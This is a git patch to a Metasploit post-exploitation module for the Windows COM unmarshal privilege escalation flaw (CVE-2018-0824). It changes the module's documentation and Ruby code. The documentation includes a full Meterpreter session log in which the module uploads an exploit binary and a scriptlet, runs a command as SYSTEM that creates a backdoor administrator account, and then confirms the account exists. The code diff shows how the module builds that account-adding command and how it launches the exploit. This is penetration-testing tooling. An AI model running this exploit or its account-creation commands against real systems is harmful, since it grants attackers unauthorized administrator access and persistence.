From 569c2e03c95759b606d4dd82d188dd6dd3cac456 Mon Sep 17 00:00:00 2001 From: bwatters-r7 Date: Tue, 23 Oct 2018 17:15:34 -0500 Subject: [PATCH] Fix exploit relics and documentation --- .../post/windows/escalate/unmarshal.md | 145 +++++++++++------- .../windows/escalate/unmarshal_cmd_exec.rb | 27 ++-- 2 files changed, 102 insertions(+), 70 deletions(-) diff --git a/documentation/modules/post/windows/escalate/unmarshal.md b/documentation/modules/post/windows/escalate/unmarshal.md index c3d266ada7..9edc4bc370 100644 --- a/documentation/modules/post/windows/escalate/unmarshal.md +++ b/documentation/modules/post/windows/escalate/unmarshal.md @@ -1,5 +1,7 @@ ## Overview -This is a post exploitation module for local privilege escalation bug which exists in Microsoft COM for windows when it fails to properly handle serialized objects. +This is a post exploitation module for local privilege escalation bug +which exists in Microsoft COM for windows when it fails to properly +handle serialized objects. * https://www.phpmyadmin.net/downloads/ * https://github.com/codewhitesec/UnmarshalPwn/ @@ -7,7 +9,7 @@ This is a post exploitation module for local privilege escalation bug which exis ## Module Options -"POCCMD" This command will be executed on successful exploitation.
+"COMMAND" This command will be executed on successful escalation.
"SESSION" The session to run this module on. ## Limitations @@ -19,7 +21,7 @@ If the system is not vulnerable, then payload will execute but new process will If you want to confirm the vulnerability before you add user or perform any other sensitive action. -1. `set POCCMD /s notepad.exe` +1. `set COMMAND /s notepad.exe` 2. `run` Confirmation: @@ -30,82 +32,117 @@ If you see notepad.exe running as SYSYEM then that is as indication of vulnerabl ## Usage ``` -meterpreter > getuid -Server username: PC2\test -meterpreter > sysinfo -Computer : PC2 -OS : Windows 10 (Build 17134). +meterpreter > sysinfo +Computer : WIN10X64-1703 +OS : Windows 10 (Build 15063). Architecture : x64 System Language : en_US -Domain : PSS -Logged On Users : 12 +Domain : WORKGROUP +Logged On Users : 2 Meterpreter : x64/windows -meterpreter > background -[*] Backgrounding session 2... +meterpreter > execute -f cmd.exe -i -H +Process 4868 created. +Channel 7 created. +Microsoft Windows [Version 10.0.15063] +(c) 2017 Microsoft Corporation. All rights reserved. -msf > use post/windows/escalate/unmarshal -msf post(windows/escalate/unmarshal) > show options +C:\Users\msfuser\Downloads>net user +net user -Module options (post/windows/escalate/unmarshal): +User accounts for \\WIN10X64-1703 - Name Current Setting - ---- --------------- -POCCMD /k net user msfuser msfpass /add && net localgroup administrators msf /add -READFILE c:\boot.ini -SESSION +------------------------------------------------------------------------------- +Administrator DefaultAccount Guest +msfuser +The command completed successfully. +C:\Users\msfuser\Downloads>exit +exit +meterpreter > background +[*] Backgrounding session 1... +msf5 post(windows/escalate/unmarshal_cmd_exec) > show options -msf post(windows/escalate/unmarshal) > set session 2 +Module options (post/windows/escalate/unmarshal_cmd_exec): + Name Current Setting Required Description + ---- --------------- -------- ----------- + COMMAND no The command to execute as SYSTEM (Can only be a cmd.exe builtin or Windows binary, (net user /add %RAND% %RAND% & net localgroup administrators /add ). + EXPLOIT_NAME no The filename to use for the exploit binary (%RAND% by default). + PATH no Path to write binaries (%TEMP% by default). + SCRIPT_NAME no The filename to use for the COM script file (%RAND% by default). + SESSION yes The session to run this module on. -msf post(windows/escalate/unmarshal) > run +msf5 post(windows/escalate/unmarshal_cmd_exec) > set command 'net user /add egypt h@ks4shellz & net localgroup administrators /add egypt' +command => net user /add egypt h@ks4shellz & net localgroup administrators /add egypt +msf5 post(windows/escalate/unmarshal_cmd_exec) > set verbose true +verbose => true +msf5 post(windows/escalate/unmarshal_cmd_exec) > run [!] SESSION may not be compatible with this module. -[*] exe name is: oQT0yWT834.exe -[*] poc name is: sJ76Il3UGj.sct -[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/UnmarshalPwn.exe -[!] writing to %TEMP% -[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe -[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_header -[!] writing to %TEMP% -[+] Persistent Script written to C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct -[*] Reading Payload from file /usr/share/metasploit-framework/data/exploits/CVE-2018-0824/poc_footer -[*] Starting module... - -[*] Location of UnmarshalPwn.exe is: C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe -[*] Location of poc.sct is: C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct -[*] Executing command : C:\Users\test\AppData\Local\Temp\oQT0yWT834.exe C:\Users\test\AppData\Local\Temp\sJ76Il3UGj.sct -Query for IStorage +[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 +[*] exploit path is: C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] script path is: C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct +[*] command is: net user /add egypt h@ks4shellz & net localgroup administrators /add egypt +[*] Attempting to PrivEsc on WIN10X64-1703 via session ID: 1 +[*] Uploading Script to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct +[*] Creating the sct file with command net user /add egypt h@ks4shellz & net localgroup administrators /add egypt +[*] script_template_data.length = 306 +[*] Writing 376 bytes to C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct to target +[*] Script uploaded successfully +[*] Uploading Exploit to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] Exploit uploaded on WIN10X64-1703 to C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] Launching Exploit... +[*] Query for IStorage Call: Stat End: Stat Query for IMarshal Call: GetMarshalSizeMax -Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000020CA320CDB0 +Unknown IID: {ECC8691B-C1DB-4DC0-855E-65F6C551AF49} 0000017F6C3E05B0 Query for IMarshal Call: GetUnmarshalClass Call: GetMarshalSizeMax Call: MarshalInterface - +[+] Exploit Completed +[*] C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe already exists on the target. Deleting... +[*] Deleted C:\Users\msfuser\AppData\Local\Temp\hylZVjgbLrd.exe +[*] C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct already exists on the target. Deleting... +[*] Deleted C:\Users\msfuser\AppData\Local\Temp\NCYcABO.sct [*] Post module execution completed +msf5 post(windows/escalate/unmarshal_cmd_exec) > sessions -i -1 +[*] Starting interaction with 1... +meterpreter > execute -f cmd.exe -i -H +Process 1780 created. +Channel 11 created. +Microsoft Windows [Version 10.0.15063] +(c) 2017 Microsoft Corporation. All rights reserved. -Confirmation -Back in Meterpreter Session - -meterpreter > shell -Process 3936 created. -Channel 185 created. -Microsoft Windows [Version 10.0.17134.1] -(c) 2018 Microsoft Corporation. All rights reserved. - -C:\temp\un>net user +C:\Users\msfuser\Downloads>net user net user -User accounts for \\PC2 +User accounts for \\WIN10X64-1703 ------------------------------------------------------------------------------- -Administrator DefaultAccount Guest -User msfuser sshd -sshd_server test WDAGUtilityAccount -The command completed successfully. +Administrator DefaultAccount egypt +Guest msfuser +The command completed successfully. + + +C:\Users\msfuser\Downloads>net localgroup administrators +net localgroup administrators +Alias name administrators +Comment Administrators have complete and unrestricted access to the computer/domain + +Members + +------------------------------------------------------------------------------- +Administrator +egypt +msfuser +The command completed successfully. + + +C:\Users\msfuser\Downloads> + +``` diff --git a/modules/post/windows/escalate/unmarshal_cmd_exec.rb b/modules/post/windows/escalate/unmarshal_cmd_exec.rb index a7904340a8..27aa347710 100644 --- a/modules/post/windows/escalate/unmarshal_cmd_exec.rb +++ b/modules/post/windows/escalate/unmarshal_cmd_exec.rb @@ -5,13 +5,11 @@ require 'msf/core/post/common' require 'msf/core/post/file' require 'msf/core/post/windows/priv' -require 'msf/core/exploit/exe' -class MetasploitModule < Msf::Exploit::Local - Rank = ExcellentRanking +class MetasploitModule < Msf::Post include Msf::Post::Common include Msf::Post::File - include Msf::Post::Windows::Priv +# include Msf::Post::Windows::Priv def initialize(info = {}) super(update_info(info, @@ -58,7 +56,6 @@ class MetasploitModule < Msf::Exploit::Local def setup super validate_active_host - @cmd_to_run = datastore['COMMAND'] @exploit_name = datastore['EXPLOIT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) @script_name = datastore['SCRIPT_NAME'] || Rex::Text.rand_text_alpha((rand(8) + 6)) @exploit_name = "#{exploit_name}.exe" unless exploit_name.match(/\.exe$/i) @@ -73,16 +70,14 @@ class MetasploitModule < Msf::Exploit::Local password = Rex::Text.rand_text_alpha((rand(8) + 6)) print_status("username = #{username}, password = #{password}") cmd_to_run = 'net user /add ' + username + ' ' + password - cmd_to_run += ' > C:\\\\Windows\\\\Temp\\\\testoutput.txt' cmd_to_run += ' & net localgroup administrators /add ' + username - cmd_to_run += ' >> C:\\\\Windows\\\\Temp\\\\testoutput.txt' print_status(cmd_to_run) return cmd_to_run end def validate_active_host begin - print_status("Attempting to PrivEsc on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") + print_status("Attempting to Run on #{sysinfo['Computer']} via session ID: #{datastore['SESSION']}") rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") raise Msf::Exploit::Failed, 'Could not connect to session' @@ -129,7 +124,7 @@ class MetasploitModule < Msf::Exploit::Local script_template_data = ::IO.read(local_script_template_path) vprint_status("script_template_data.length = #{script_template_data.length}") full_command = 'cmd.exe /c ' + cmd_to_run - full_command = cmd_to_run + full_command = full_command script_data = script_template_data.sub!('SCRIPTED_COMMAND', full_command) if script_data == nil fail_with(Failure::BadConfig, "Failed to substitute command in script_template") @@ -139,9 +134,11 @@ class MetasploitModule < Msf::Exploit::Local vprint_status('Script uploaded successfully') end - def exploit - if cmd_to_run.nil? + def run + if datastore['COMMAND'].nil? cmd_to_run = populate_command + else + cmd_to_run = datastore['COMMAND'] end print_status("exploit path is: #{exploit_path}") print_status("script path is: #{script_path}") @@ -159,20 +156,18 @@ class MetasploitModule < Msf::Exploit::Local vprint_status('Launching Exploit...') command_output = cmd_exec(exploit_path + ' ' + script_path) vprint_status(command_output) - print_good('Exploit completed, wait for elevated session') + print_good('Exploit Completed') ensure_clean_destination(exploit_path) -# ensure_clean_destination(script_path) + ensure_clean_destination(script_path) rescue Rex::Post::Meterpreter::RequestError => e elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}") print_good('Command failed, cleaning up') print_error(e.message) ensure_clean_destination(exploit_path) -# ensure_clean_destination(script_path) + ensure_clean_destination(script_path) end end - attr_reader :exploit_name - attr_reader :cmd_to_run attr_reader :script_name attr_reader :temp_path attr_reader :exploit_path